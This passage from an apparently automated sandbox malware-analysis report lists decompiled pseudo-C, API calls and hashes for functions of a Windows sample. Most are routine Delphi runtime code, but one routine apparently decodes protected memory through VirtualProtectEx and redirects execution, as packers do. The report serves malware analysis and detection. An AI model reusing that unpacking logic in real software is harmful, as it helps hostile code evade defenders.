                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Virtual$AllocFree
                                                                        • String ID:
                                                                        • API String ID: 2087232378-0
                                                                        • Opcode ID: 9e2649f51290d73c37372646d6b2be47bcd4918fbfb34046e085b880d4026c3a
                                                                        • Instruction ID: 904b9d4922f68113b59492f8b44d46dc7ec4cb2fb37737401e8004d19412cf8b
                                                                        • Opcode Fuzzy Hash: 9e2649f51290d73c37372646d6b2be47bcd4918fbfb34046e085b880d4026c3a
                                                                        • Instruction Fuzzy Hash: 88F0E272B003202BEB205A6A0CC1B536AC49B857A4F190477B948FF3E9D67A8C0082A9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0047942C, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0047942C(void* __edi, void* __esi, void* __eflags, intOrPtr* _a4) {
				long _v8;
				void* __ebx;
				void* __ecx;
				signed int _t22;
				signed int _t29;
				intOrPtr* _t31;

				_t31 = _a4;
				if(E0047940C( *((intOrPtr*)( *_t31))) == 0) {
					if(E00479418( *((intOrPtr*)( *_t31))) == 0) {
						return 0;
					}
					 *((intOrPtr*)( *(_t31 + 4) + 0xb8)) = 0x479404;
					return 0xffffffffffffffff;
				}
				_t22 =  *(_t31 + 4);
				if(( *(_t22 + 0xa8) ^ 0x000ba895) != 0x9a1e0) {
					return 0;
				}
				VirtualProtectEx(0xffffffff,  *(_t22 + 0xa0), 0x1415a, 4,  &_v8); // executed
				E0047951C(_t31,  *((intOrPtr*)( *(_t31 + 4) + 0xa0)), 0x1415a, __edi, __esi, 0x1aa6f, 0x47ade0);
				_t29 =  *(_t31 + 4);
				 *((intOrPtr*)(_t29 + 0xb8)) =  *((intOrPtr*)(_t29 + 0xb8)) + 0x62f5;
				return _t29 | 0xffffffff;
			}









                                                                        0x00479431
                                                                        0x0047943f
                                                                        0x004794b1
                                                                        0x00000000
                                                                        0x004794c6
                                                                        0x004794bb
                                                                        0x00000000
                                                                        0x004794c1
                                                                        0x00479441
                                                                        0x00479456
                                                                        0x00000000
                                                                        0x004794a2
                                                                        0x0047946c
                                                                        0x0047948b
                                                                        0x00479490
                                                                        0x00479493
                                                                        0x00000000

                                                                        APIs
                                                                        • VirtualProtectEx.KERNEL32(000000FF,?,0001415A,00000004,?), ref: 0047946C
                                                                          • Part of subcall function 0047951C: GetKeyboardType.USER32(00000000), ref: 0047958B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: KeyboardProtectTypeVirtual
                                                                        • String ID:
                                                                        • API String ID: 687961724-0
                                                                        • Opcode ID: a14af51c247e0b399cf11fe92d5a90e969ef7e6e005634e7367ce840528c0a59
                                                                        • Instruction ID: fc2a89276082dc8536020b565f8470d0cf6bf16a89c644c3f15dbdb255ca1576
                                                                        • Opcode Fuzzy Hash: a14af51c247e0b399cf11fe92d5a90e969ef7e6e005634e7367ce840528c0a59
                                                                        • Instruction Fuzzy Hash: 64113031248200AFCB50DB15C981EE573A5EB46364F64C7A6E92C5F396D634EC46CB2A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040733E, Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0040733E(CHAR* __eax, long __ecx, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
				struct HWND__* _t10;

				_t10 = CreateWindowExA(0, __eax, __edx, __ecx, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				return _t10;
			}




                                                                        0x00407369
                                                                        0x00407370

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CreateWindow
                                                                        • String ID:
                                                                        • API String ID: 716092398-0
                                                                        • Opcode ID: 80272dabcd13070f2b0510fd908a943113dc0608c8ac620f3197796e7cfed276
                                                                        • Instruction ID: 3ae3b0bb6aa290208680c541b8da8ad6351dd4405c79d6abd1241d14a227bfc1
                                                                        • Opcode Fuzzy Hash: 80272dabcd13070f2b0510fd908a943113dc0608c8ac620f3197796e7cfed276
                                                                        • Instruction Fuzzy Hash: A7E002B2204309BFEB00DE8ADCC1DABB7ACFB4C654F854115BB1C97242D275AD608B71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00407340, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00407340(CHAR* __eax, long __ecx, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
				struct HWND__* _t10;

				_t10 = CreateWindowExA(0, __eax, __edx, __ecx, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				return _t10;
			}




                                                                        0x00407369
                                                                        0x00407370

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CreateWindow
                                                                        • String ID:
                                                                        • API String ID: 716092398-0
                                                                        • Opcode ID: f8749ca0a26f364fac6116af4e158c42e39b8565b85338519646d0319e4c55ad
                                                                        • Instruction ID: 109ed22ea2e506524b14edc0d0bd377e8b92066772ad28182da1425e8690dcbf
                                                                        • Opcode Fuzzy Hash: f8749ca0a26f364fac6116af4e158c42e39b8565b85338519646d0319e4c55ad
                                                                        • Instruction Fuzzy Hash: F7E002B2204309BFDB00DE8ADCC1DABB7ACFB4C654F854105BB1C972429275AD608B71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405A64, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00405A64(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					_t3 = _t16 + 4; // 0x400000
					GetModuleFileNameA( *_t3,  &_v272, 0x105);
					_t14 = E00405CA0(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						_t5 = _t16 + 4; // 0x400000
						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
					}
				}
				_t7 = _t16 + 0x10; // 0x400000
				return  *_t7;
			}








                                                                        0x00405a6c
                                                                        0x00405a72
                                                                        0x00405a7e
                                                                        0x00405a82
                                                                        0x00405a8b
                                                                        0x00405a90
                                                                        0x00405a92
                                                                        0x00405a97
                                                                        0x00405a99
                                                                        0x00405a9c
                                                                        0x00405a9c
                                                                        0x00405a97
                                                                        0x00405a9f
                                                                        0x00405aaa

                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(00400000,?,00000105,00000001,004104D0,00405ACC,00406578,0000FF99,?,00000400,?,004104D0,004141B7,00000000,004141DC), ref: 00405A82
                                                                          • Part of subcall function 00405CA0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,0047A08C,?,00405A90,00400000,?,00000105,00000001,004104D0,00405ACC,00406578,0000FF99,?), ref: 00405CBC
                                                                          • Part of subcall function 00405CA0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0047A08C,?,00405A90,00400000,?,00000105,00000001), ref: 00405CDA
                                                                          • Part of subcall function 00405CA0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0047A08C), ref: 00405CF8
                                                                          • Part of subcall function 00405CA0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405D16
                                                                          • Part of subcall function 00405CA0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405D5F
                                                                          • Part of subcall function 00405CA0: RegQueryValueExA.ADVAPI32(?,00405F0C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,00405DA5,?,80000001), ref: 00405D7D
                                                                          • Part of subcall function 00405CA0: RegCloseKey.ADVAPI32(?,00405DAC,00000000,00000000,00000005,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405D9F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Open$FileModuleNameQueryValue$Close
                                                                        • String ID:
                                                                        • API String ID: 2796650324-0
                                                                        • Opcode ID: 3d2362743f924f875b5a350bdc77fee5870a8126f4c59cb65ab49357851bb911
                                                                        • Instruction ID: d33aed5311a0e2fae4487a5322506e26d3b21fe1229f44e33d68ae0e5b1a5d0f
                                                                        • Opcode Fuzzy Hash: 3d2362743f924f875b5a350bdc77fee5870a8126f4c59cb65ab49357851bb911
                                                                        • Instruction Fuzzy Hash: 29E06D71A007208FDB10DEA888C1A4737D8AB08794F000A66FC58EF38AD374DD108BD4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040174C, Relevance: 1.3, APIs: 1, Instructions: 54memoryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0040174C(signed int __eax, void** __ecx, intOrPtr __edx) {
				signed int _v20;
				void** _v24;
				void* _t15;
				void** _t16;
				void* _t17;
				signed int _t27;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr* _t32;

				_v24 = __ecx;
				 *_t32 = __edx;
				_t31 = __eax & 0xfffff000;
				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
				 *_v24 = _t31;
				_t15 = _v20 - _t31;
				_v24[1] = _t15;
				_t29 =  *0x4965e4; // 0x69c334
				while(_t29 != 0x4965e4) {
					_t17 =  *(_t29 + 8);
					_t27 =  *((intOrPtr*)(_t29 + 0xc)) + _t17;
					if(_t31 > _t17) {
						_t17 = _t31;
					}
					if(_t27 > _v20) {
						_t27 = _v20;
					}
					if(_t27 > _t17) {
						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
						if(_t15 == 0) {
							_t16 = _v24;
							 *_t16 = 0;
							return _t16;
						}
					}
					_t29 =  *_t29;
				}
				return _t15;
			}












                                                                        0x00401753
                                                                        0x00401757
                                                                        0x0040175e
                                                                        0x00401773
                                                                        0x0040177b
                                                                        0x00401781
                                                                        0x00401787
                                                                        0x0040178a
                                                                        0x004017ce
                                                                        0x00401792
                                                                        0x00401798
                                                                        0x0040179c
                                                                        0x0040179e
                                                                        0x0040179e
                                                                        0x004017a4
                                                                        0x004017a6
                                                                        0x004017a6
                                                                        0x004017ac
                                                                        0x004017b9
                                                                        0x004017c0
                                                                        0x004017c2
                                                                        0x004017c8
                                                                        0x00000000
                                                                        0x004017c8
                                                                        0x004017c0
                                                                        0x004017cc
                                                                        0x004017cc
                                                                        0x004017dd

                                                                        APIs
                                                                        • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 004017B9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: c9ed9fcde6cb23d72c6a0544bc66612bea3eb4eb7cb598ee75956fec592b491e
                                                                        • Instruction ID: df40b9f29fcf593a2001ebb942b006e8579671ba7d571f2f05a33fea13171e4b
                                                                        • Opcode Fuzzy Hash: c9ed9fcde6cb23d72c6a0544bc66612bea3eb4eb7cb598ee75956fec592b491e
                                                                        • Instruction Fuzzy Hash: F1118E76A04705AFC3109F29C880A2BBBE1EFD4760F16C53EE598A73A5D735AC408789
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0041D260, Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0041D260(intOrPtr _a4, intOrPtr _a8) {
				void* _t14;
				void _t15;
				intOrPtr _t25;
				char* _t26;
				void* _t35;

				if( *0x496a20 == 0) {
					_t14 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
					_t35 = _t14;
					_t15 =  *0x496a1c; // 0x2260000
					 *_t35 = _t15;
					_t1 = _t35 + 4; // 0x4
					E004029BC(0x47a4bc, 2, _t1);
					_t2 = _t35 + 5; // 0x5
					 *((intOrPtr*)(_t35 + 6)) = E0041D258(_t2, E0041D238);
					_t4 = _t35 + 0xa; // 0xa
					_t26 = _t4;
					do {
						 *_t26 = 0xe8;
						_t5 = _t35 + 4; // 0x4
						 *((intOrPtr*)(_t26 + 1)) = E0041D258(_t26, _t5);
						 *((intOrPtr*)(_t26 + 5)) =  *0x496a20;
						 *0x496a20 = _t26;
						_t26 = _t26 + 0xd;
					} while (_t26 - _t35 < 0xffc);
					 *0x496a1c = _t35;
				}
				_t25 =  *0x496a20;
				 *0x496a20 =  *((intOrPtr*)(_t25 + 5));
				 *((intOrPtr*)(_t25 + 5)) = _a4;
				 *((intOrPtr*)(_t25 + 9)) = _a8;
				return  *0x496a20;
			}








                                                                        0x0041d26e
                                                                        0x0041d27e
                                                                        0x0041d283
                                                                        0x0041d285
                                                                        0x0041d28a
                                                                        0x0041d28c
                                                                        0x0041d299
                                                                        0x0041d2a3
                                                                        0x0041d2ab
                                                                        0x0041d2ae
                                                                        0x0041d2ae
                                                                        0x0041d2b1
                                                                        0x0041d2b1
                                                                        0x0041d2b4
                                                                        0x0041d2be
                                                                        0x0041d2c3
                                                                        0x0041d2c6
                                                                        0x0041d2c8
                                                                        0x0041d2cf
                                                                        0x0041d2d6
                                                                        0x0041d2d6
                                                                        0x0041d2de
                                                                        0x0041d2e3
                                                                        0x0041d2e8
                                                                        0x0041d2ee
                                                                        0x0041d2f5

                                                                        APIs
                                                                        • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041D27E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 3c5408913deefef89f740840773542ad306855a6b70ed471a7900e0b2845a8e5
                                                                        • Instruction ID: ab322e860265238dc008cf03a3abd9f104667954c24ec927d3ccddf525789675
                                                                        • Opcode Fuzzy Hash: 3c5408913deefef89f740840773542ad306855a6b70ed471a7900e0b2845a8e5
                                                                        • Instruction Fuzzy Hash: 3A119E746003058FC710DF19C880B82FBE0EF88350F10C57BE9699B385D3B8E9018BA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Function 004414DC, Relevance: 49.1, APIs: 15, Strings: 13, Instructions: 95libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 83%
                                                                        			E004414DC() {
				int _v8;
				intOrPtr _t4;
				struct HINSTANCE__* _t11;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t15;
				struct HINSTANCE__* _t17;
				struct HINSTANCE__* _t19;
				struct HINSTANCE__* _t21;
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t25;
				struct HINSTANCE__* _t27;
				struct HINSTANCE__* _t29;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t44;

				_t42 = _t44;
				_t4 =  *0x495c50; // 0x4967f0
				if( *((char*)(_t4 + 0xc)) == 0) {
					return _t4;
				} else {
					_v8 = SetErrorMode(0x8000);
					_push(_t42);
					_push(0x441642);
					_push( *[fs:eax]);
					 *[fs:eax] = _t44;
					if( *0x496bc0 == 0) {
						 *0x496bc0 = GetProcAddress(GetModuleHandleA("USER32"), "WINNLSEnableIME");
					}
					if( *0x47a9d8 == 0) {
						 *0x47a9d8 = LoadLibraryA("IMM32.DLL");
						if( *0x47a9d8 != 0) {
							_t11 =  *0x47a9d8; // 0x0
							 *0x496bc4 = GetProcAddress(_t11, "ImmGetContext");
							_t13 =  *0x47a9d8; // 0x0
							 *0x496bc8 = GetProcAddress(_t13, "ImmReleaseContext");
							_t15 =  *0x47a9d8; // 0x0
							 *0x496bcc = GetProcAddress(_t15, "ImmGetConversionStatus");
							_t17 =  *0x47a9d8; // 0x0
							 *0x496bd0 = GetProcAddress(_t17, "ImmSetConversionStatus");
							_t19 =  *0x47a9d8; // 0x0
							 *0x496bd4 = GetProcAddress(_t19, "ImmSetOpenStatus");
							_t21 =  *0x47a9d8; // 0x0
							 *0x496bd8 = GetProcAddress(_t21, "ImmSetCompositionWindow");
							_t23 =  *0x47a9d8; // 0x0
							 *0x496bdc = GetProcAddress(_t23, "ImmSetCompositionFontA");
							_t25 =  *0x47a9d8; // 0x0
							 *0x496be0 = GetProcAddress(_t25, "ImmGetCompositionStringA");
							_t27 =  *0x47a9d8; // 0x0
							 *0x496be4 = GetProcAddress(_t27, "ImmIsIME");
							_t29 =  *0x47a9d8; // 0x0
							 *0x496be8 = GetProcAddress(_t29, "ImmNotifyIME");
						}
					}
					_pop(_t40);
					 *[fs:eax] = _t40;
					_push(0x441649);
					return SetErrorMode(_v8);
				}
			}


















                                                                        0x004414dd
                                                                        0x004414e1
                                                                        0x004414ea
                                                                        0x0044164c
                                                                        0x004414f0
                                                                        0x004414fa
                                                                        0x004414ff
                                                                        0x00441500
                                                                        0x00441505
                                                                        0x00441508
                                                                        0x00441512
                                                                        0x0044152b
                                                                        0x0044152b
                                                                        0x00441537
                                                                        0x00441547
                                                                        0x00441553
                                                                        0x0044155e
                                                                        0x00441569
                                                                        0x00441573
                                                                        0x0044157e
                                                                        0x00441588
                                                                        0x00441593
                                                                        0x0044159d
                                                                        0x004415a8
                                                                        0x004415b2
                                                                        0x004415bd
                                                                        0x004415c7
                                                                        0x004415d2
                                                                        0x004415dc
                                                                        0x004415e7
                                                                        0x004415f1
                                                                        0x004415fc
                                                                        0x00441606
                                                                        0x00441611
                                                                        0x0044161b
                                                                        0x00441626
                                                                        0x00441626
                                                                        0x00441553
                                                                        0x0044162d
                                                                        0x00441630
                                                                        0x00441633
                                                                        0x00441641
                                                                        0x00441641

                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00008000), ref: 004414F5
                                                                        • GetModuleHandleA.KERNEL32(USER32,00000000,00441642,?,00008000), ref: 00441519
                                                                        • GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00441526
                                                                        • LoadLibraryA.KERNEL32(IMM32.DLL,00000000,00441642,?,00008000), ref: 00441542
                                                                        • GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00441564
                                                                        • GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00441579
                                                                        • GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 0044158E
                                                                        • GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 004415A3
                                                                        • GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 004415B8
                                                                        • GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 004415CD
                                                                        • GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 004415E2
                                                                        • GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 004415F7
                                                                        • GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 0044160C
                                                                        • GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00441621
                                                                        • SetErrorMode.KERNEL32(?,00441649,00008000), ref: 0044163C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
                                                                        • String ID: IMM32.DLL$ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME
                                                                        • API String ID: 3397921170-3271328588
                                                                        • Opcode ID: 41a94cf38aa0804b9e477ae109e7c998ef35792528566ebdd79e8338eb352709
                                                                        • Instruction ID: 689e1dabb6478f76fac1ff0258cb51012081a979876a385ea78672b4cdf9856c
                                                                        • Opcode Fuzzy Hash: 41a94cf38aa0804b9e477ae109e7c998ef35792528566ebdd79e8338eb352709
                                                                        • Instruction Fuzzy Hash: B8318FF0641350AFE700EFA5EC56A297BA8E354305B13483BF109DB6B1E67D98E08B1C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405AE8, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 136stringlibraryfileCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 53%
                                                                        			E00405AE8(char* __eax, intOrPtr __edx) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				struct _WIN32_FIND_DATAA _v334;
				char _v595;
				void* _t45;
				char* _t54;
				char* _t64;
				void* _t83;
				intOrPtr* _t84;
				char* _t90;
				struct HINSTANCE__* _t91;
				char* _t93;
				void* _t94;
				char* _t95;
				void* _t96;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t91 = GetModuleHandleA("kernel32.dll");
				if(_t91 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t93 = _v8 + 2;
						goto L10;
					} else {
						if( *((char*)(_v8 + 1)) == 0x5c) {
							_t95 = E00405AD4(_v8 + 2);
							if( *_t95 != 0) {
								_t14 = _t95 + 1; // 0x1
								_t93 = E00405AD4(_t14);
								if( *_t93 != 0) {
									L10:
									_t83 = _t93 - _v8;
									_push(_t83 + 1);
									_push(_v8);
									_push( &_v595);
									L00401338();
									while( *_t93 != 0) {
										_t90 = E00405AD4(_t93 + 1);
										_t45 = _t90 - _t93;
										if(_t45 + _t83 + 1 <= 0x105) {
											_push(_t45 + 1);
											_push(_t93);
											_push( &(( &_v595)[_t83]));
											L00401338();
											_t94 = FindFirstFileA( &_v595,  &_v334);
											if(_t94 != 0xffffffff) {
												FindClose(_t94);
												_t54 =  &(_v334.cFileName);
												_push(_t54);
												L00401340();
												if(_t54 + _t83 + 1 + 1 <= 0x105) {
													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
													_push(0x105 - _t83 - 1);
													_push( &(_v334.cFileName));
													_push( &(( &(( &_v595)[_t83]))[1]));
													L00401338();
													_t64 =  &(_v334.cFileName);
													_push(_t64);
													L00401340();
													_t83 = _t83 + _t64 + 1;
													_t93 = _t90;
													continue;
												}
											}
										}
										goto L17;
									}
									_push(_v12);
									_push( &_v595);
									_push(_v8);
									L00401338();
								}
							}
						}
					}
				} else {
					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
					if(_t84 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v595);
						_push(_v8);
						if( *_t84() == 0) {
							goto L4;
						} else {
							_push(_v12);
							_push( &_v595);
							_push(_v8);
							L00401338();
						}
					}
				}
				L17:
				return _v16;
			}



















                                                                        0x00405af4
                                                                        0x00405af7
                                                                        0x00405afd
                                                                        0x00405b0a
                                                                        0x00405b0e
                                                                        0x00405b50
                                                                        0x00405b56
                                                                        0x00405b93
                                                                        0x00000000
                                                                        0x00405b58
                                                                        0x00405b5f
                                                                        0x00405b70
                                                                        0x00405b75
                                                                        0x00405b7b
                                                                        0x00405b83
                                                                        0x00405b88
                                                                        0x00405b96
                                                                        0x00405b98
                                                                        0x00405b9e
                                                                        0x00405ba2
                                                                        0x00405ba9
                                                                        0x00405baa
                                                                        0x00405c55
                                                                        0x00405bbc
                                                                        0x00405bc0
                                                                        0x00405bcd
                                                                        0x00405bd4
                                                                        0x00405bd5
                                                                        0x00405bde
                                                                        0x00405bdf
                                                                        0x00405bf7
                                                                        0x00405bfc
                                                                        0x00405bff
                                                                        0x00405c04
                                                                        0x00405c0a
                                                                        0x00405c0b
                                                                        0x00405c1b
                                                                        0x00405c1d
                                                                        0x00405c2d
                                                                        0x00405c34
                                                                        0x00405c3e
                                                                        0x00405c3f
                                                                        0x00405c44
                                                                        0x00405c4a
                                                                        0x00405c4b
                                                                        0x00405c51
                                                                        0x00405c53
                                                                        0x00000000
                                                                        0x00405c53
                                                                        0x00405c1b
                                                                        0x00405bfc
                                                                        0x00000000
                                                                        0x00405bcd
                                                                        0x00405c61
                                                                        0x00405c68
                                                                        0x00405c6c
                                                                        0x00405c6d
                                                                        0x00405c6d
                                                                        0x00405b88
                                                                        0x00405b75
                                                                        0x00405b5f
                                                                        0x00405b10
                                                                        0x00405b1b
                                                                        0x00405b1f
                                                                        0x00000000
                                                                        0x00405b21
                                                                        0x00405b21
                                                                        0x00405b2c
                                                                        0x00405b30
                                                                        0x00405b35
                                                                        0x00000000
                                                                        0x00405b37
                                                                        0x00405b3a
                                                                        0x00405b41
                                                                        0x00405b45
                                                                        0x00405b46
                                                                        0x00405b46
